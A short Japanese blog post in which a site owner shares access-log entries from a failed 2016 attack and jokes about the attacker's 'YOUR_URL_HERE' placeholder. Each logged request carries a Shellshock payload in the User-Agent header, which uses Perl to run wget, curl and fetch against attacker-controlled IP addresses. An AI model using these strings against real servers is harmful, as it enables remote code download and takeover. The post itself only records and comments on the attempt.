Webページアクセスログを見ていたら、目の前で怪しいアクセスが発生。
エラーコードは400番台なので全部失敗に終わっています。というか、ルート以外は、そんなCGIコマンド置いてない!
185.125.4.222 - - [24/Jul/2016:10:45:05 +0900] "GET HTTP/1.1 HTTP/1.1" 400 977 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://185.125.4.222/YOUR_URL_HERE ; curl -O http://185.125.4.222/YOUR_URL_HERE ; fetch http://212.154.211.81/185.125.4.222 \");'" 185.125.4.222 - - [24/Jul/2016:10:45:16 +0900] "GET /web-console/ HTTP/1.1" 404 17514 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://185.125.4.222/YOUR_URL_HERE ; curl -O http://185.125.4.222/YOUR_URL_HERE ; fetch http://212.154.211.81/185.125.4.222 \");'" 185.125.4.222 - - [24/Jul/2016:10:45:10 +0900] "GET /jmx-console/ HTTP/1.1" 404 17514 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://185.125.4.222/YOUR_URL_HERE ; curl -O http://185.125.4.222/YOUR_URL_HERE ; fetch http://212.154.211.81/185.125.4.222 \");'" 185.125.4.222 - - [24/Jul/2016:10:45:22 +0900] "GET /invoker/ HTTP/1.1" 404 17514 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://185.125.4.222/YOUR_URL_HERE ; curl -O http://185.125.4.222/YOUR_URL_HERE ; fetch http://212.154.211.81/185.125.4.222 \");'" 185.125.4.222 - - [24/Jul/2016:10:45:25 +0900] "GET /admin-console/ HTTP/1.1" 404 17514 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://185.125.4.222/YOUR_URL_HERE ; curl -O http://185.125.4.222/YOUR_URL_HERE ; fetch http://212.154.211.81/185.125.4.222 \");'" 185.125.4.222 - - [24/Jul/2016:10:45:29 +0900] "GET /cgi-bin/test HTTP/1.1" 404 1044 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://185.125.4.222/YOUR_URL_HERE ; curl -O http://185.125.4.222/YOUR_URL_HERE ; fetch http://212.154.211.81/185.125.4.222 \");'" 185.125.4.222 - - [24/Jul/2016:10:45:30 +0900] "GET /cgi-sys/php5 HTTP/1.1" 404 17514 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://185.125.4.222/YOUR_URL_HERE ; curl -O http://185.125.4.222/YOUR_URL_HERE ; fetch http://212.154.211.81/185.125.4.222 \");'" 185.125.4.222 - - [24/Jul/2016:10:45:34 +0900] "GET /cgi-mod/index.cgi HTTP/1.1" 404 17514 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://185.125.4.222/YOUR_URL_HERE ; curl -O http://185.125.4.222/YOUR_URL_HERE ; fetch http://212.154.211.81/185.125.4.222 \");'"
何を狙っているのか知りませんけど、コマンド中に「YOUR_URL_HERE」ってあることは、裏サイトのツールキットをそのまま使っている?ひょっとすると、自分のPCをそのまま使ってテストしているおバカ?